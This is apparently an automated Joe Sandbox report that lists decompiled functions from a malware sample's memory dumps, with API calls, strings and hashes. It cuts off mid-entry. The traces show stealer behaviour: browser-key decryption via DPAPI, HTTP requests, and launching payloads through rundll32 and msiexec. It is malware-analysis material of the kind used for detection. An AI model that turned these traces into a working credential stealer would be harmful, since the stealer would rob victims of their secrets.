Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02D471B0), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02D465D8,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
lstrlenA.KERNEL32(00000000), ref: 0041557F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
lstrlenA.KERNEL32(00000000), ref: 004155D3
strtok.MSVCRT(00000000,?), ref: 004155EE
lstrlenA.KERNEL32(00000000), ref: 004155FE

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

ERROR, xrefs: 00415682
lXA, xrefs: 0041570E, 004156D4, 00415697, 0041565A, 0041561E
ERROR, xrefs: 004156BF
ERROR, xrefs: 0041555A
ERROR, xrefs: 00415609
ERROR, xrefs: 004156F9

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
API String ID: 3532888709-2643084821
Opcode ID: f583cb59902c634f795bc8628de2438de7f223d1d9f65b2586ae20ee4a978373
Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
Opcode Fuzzy Hash: f583cb59902c634f795bc8628de2438de7f223d1d9f65b2586ae20ee4a978373
Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A

Function 6CFBADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CFBADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFBAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFBAE29

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFBAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CFBAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFBAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CFBAEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6CFBAE1F, 6CFBAE80
C_MessageSignInit, xrefs: 6CFBADE1
hSession = 0x%x, xrefs: 6CFBAE01, 6CFBAE11
hKey = 0x%x, xrefs: 6CFBAE62, 6CFBAE72
nm, xrefs: 6CFBAEB8, 6CFBAEE6

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nm
API String ID: 332880674-1801229639
Opcode ID: 937675157d1aa36cdc44f620e8ab0d186bf71cee39a31f19d92f79da25afec2c
Instruction ID: 863fe682118d76fd37054651f8edf4a759dcacbaa5fa47bf09f93d37e42f4c65
Opcode Fuzzy Hash: 937675157d1aa36cdc44f620e8ab0d186bf71cee39a31f19d92f79da25afec2c
Instruction Fuzzy Hash: 6B310832504209ABEB15DF66DC84FEF37B5AB46709F494029F50CBB252DB349904CBA1

Function 6CFB2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CFB2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB2E33

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFB2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFB2E81

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB2E2C
ulPinLen = %d, xrefs: 6CFB2E7C
C_InitPIN, xrefs: 6CFB2DF1
pPin = 0x%p, xrefs: 6CFB2E63
hSession = 0x%x, xrefs: 6CFB2E0E, 6CFB2E1E
nm, xrefs: 6CFB2E99, 6CFB2EC4

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nm
API String ID: 1003633598-3914294817
Opcode ID: 2ae8a113a92df76963b9ed1f60ca78ce9e1b306d8290d5d8e242b59e14dfd698
Instruction ID: a67e911b68fb695bf54d419ec71f58b02728088e7fc763a65156cfd82161b2c5
Opcode Fuzzy Hash: 2ae8a113a92df76963b9ed1f60ca78ce9e1b306d8290d5d8e242b59e14dfd698
Instruction Fuzzy Hash: FB312671905119ABEB14DB77DC48B9F3775EB46718F094025F908BB292DB319A08CBA1

Function 6CFB6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CFB6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB6F53

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CFB6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CFB6FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB6F4C
C_DigestUpdate, xrefs: 6CFB6F11
hSession = 0x%x, xrefs: 6CFB6F2E, 6CFB6F3E
ulPartLen = %d, xrefs: 6CFB6F9C
nm, xrefs: 6CFB6FB9, 6CFB6FE7
pPart = 0x%p, xrefs: 6CFB6F83

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nm
API String ID: 1003633598-1279893338
Opcode ID: eaf107a208bc06537286f33f913154175b8c871e7b51046a08acb6ef686033e1
Instruction ID: f607203df3e65b67502ac47fbfec417aa4db5396f256ad1b6fce6162fb2917d0
Opcode Fuzzy Hash: eaf107a208bc06537286f33f913154175b8c871e7b51046a08acb6ef686033e1
Instruction Fuzzy Hash: DD31F435909104AFEB18DB76DD48F5A77B5EB42718F094065F908FB252EB30D948CBA1

Function 6CFC6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFC781D,00000000,6CFBBE2C,?,6CFC6B1D,?,?,?,?,00000000,00000000,6CFC781D), ref: 6CFC6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFC781D,?,6CFBBE2C,?), ref: 6CFC6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFC781D), ref: 6CFC6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFC6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFC6C96

Part of subcall function 6CF71240: TlsGetValue.KERNEL32(00000040,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF71267
Part of subcall function 6CF71240: EnterCriticalSection.KERNEL32(?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF7127C
Part of subcall function 6CF71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF71291
Part of subcall function 6CF71240: PR_Unlock.NSS3(?,?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF712A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFC6CAA

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6CFC6C91
dbm:, xrefs: 6CFC6C3A
sql:, xrefs: 6CFC6C52
extern:, xrefs: 6CFC6C7E
rdb:, xrefs: 6CFC6C69
dbm, xrefs: 6CFC6CA4

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: a9dfc270e65fcb87cfc503a277130b6b453b54f21671d7a430025387379b2f1d
Instruction ID: 4980d3f1f10518a443f2d2332740ee2c0a51cf420d66f12530b9e499f05d824b
Opcode Fuzzy Hash: a9dfc270e65fcb87cfc503a277130b6b453b54f21671d7a430025387379b2f1d
Instruction Fuzzy Hash: 950167F1B0631267F51017795D5AF3B355D9FC5259F040132FF18E15C2EBA6E914406B

Function 6CFD25F0 Relevance: 19.9, APIs: 8, Strings: 5, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFDA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CFAA5DF,?,00000000,6CF828AD,00000000,?,6CFAA5DF,?,object), ref: 6CFDA0C0
Part of subcall function 6CFDA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CFAA5DF,?,00000000,6CF828AD,00000000,?,6CFAA5DF,?,object), ref: 6CFDA0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFD2834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6CFD284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFD2A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6CFD2AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFD2BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFD2BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFD2D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6CFD2D34

Strings

token, xrefs: 6CFD25FA
serial, xrefs: 6CFD2AC2
manufacturer, xrefs: 6CFD285E
model, xrefs: 6CFD2C06
, xrefs: 6CFD2A8E, 6CFD2AAB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $manufacturer$model$serial$token
API String ID: 2407968032-2628435027
Opcode ID: 7c4de661f4e4cf09e6dfb585012bd3555474ccfd0e2e5495592f2cd805da0401
Instruction ID: 73a51cf1e43c31c5c0aa21904cbf4c301fb5d8bbdc5f1aa4a56a66d0ee1a3eaf
Opcode Fuzzy Hash: 7c4de661f4e4cf09e6dfb585012bd3555474ccfd0e2e5495592f2cd805da0401
Instruction Fuzzy Hash: 2302B0A1E0C3C96EF7358762C88CBE52AE09B0531CF4F11F5D94D8BAA3C6AD1D859391

Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411557
strtok_s.MSVCRT ref: 004119A0

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0a5dcbbe8a66e6fdb00a73657062fe0da905fa79a61454ad0d527a9e9b2063d0
Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
Opcode Fuzzy Hash: 0a5dcbbe8a66e6fdb00a73657062fe0da905fa79a61454ad0d527a9e9b2063d0
Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95

Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00413415
ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
ShellExecuteEx.SHELL32(0000003C), ref: 0041373A

Strings

/passive, xrefs: 004136AB
.dll, xrefs: 00413435
<, xrefs: 004136E0
C:\Windows\system32\msiexec.exe, xrefs: 0041370F
C:\Windows\system32\rundll32.exe, xrefs: 00413582
"" , xrefs: 004132EA
/i ", xrefs: 00413634
.msi, xrefs: 004135E8

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 6117d424d471dd9be6a72e6ca9c0a5696e4fdeccbdd3b3b1fd13794393a24ff4
Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
Opcode Fuzzy Hash: 6117d424d471dd9be6a72e6ca9c0a5696e4fdeccbdd3b3b1fd13794393a24ff4
Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9

Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144EE
memset.MSVCRT ref: 00414505

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 0041453C
lstrcatA.KERNEL32(?,02D45350), ref: 0041455B
lstrcatA.KERNEL32(?,?), ref: 0041456F
lstrcatA.KERNEL32(?,02D45470), ref: 00414583

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563

StrStrA.SHLWAPI(?,02D45320), ref: 00414643
GlobalFree.KERNEL32(?), ref: 00414762

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrcatA.KERNEL32(?,00000000), ref: 004146F3
StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
lstrcatA.KERNEL32(00000000,?), ref: 00414735
lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: fd3576fffe6250f2044dcb82a031a876fd47f4879193f78ab4990c47fb6b5ad0
Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
Opcode Fuzzy Hash: fd3576fffe6250f2044dcb82a031a876fd47f4879193f78ab4990c47fb6b5ad0
Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55

Function 6CF7ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF7ACE2
malloc.MOZGLUE(00000001), ref: 6CF7ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF7AD02
TlsGetValue.KERNEL32 ref: 6CF7AD3C
calloc.MOZGLUE(00000001,?), ref: 6CF7AD8C
PR_Unlock.NSS3 ref: 6CF7ADC0
free.MOZGLUE(00000000), ref: 6CF7AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF7AE58
free.MOZGLUE(00000000), ref: 6CF7AE69
free.MOZGLUE(?), ref: 6CF7AE78
PR_Unlock.NSS3 ref: 6CF7AE8C
free.MOZGLUE(?), ref: 6CF7AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF7AEC7

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: acb478f69d9dd4dcf57b6e99cf48e56464ef30c35e8b9a6da44ee5855503d079
Instruction ID: 2a89892eeebd219820ee07ec90d530e14055862a01067c20076e704e6c73732f
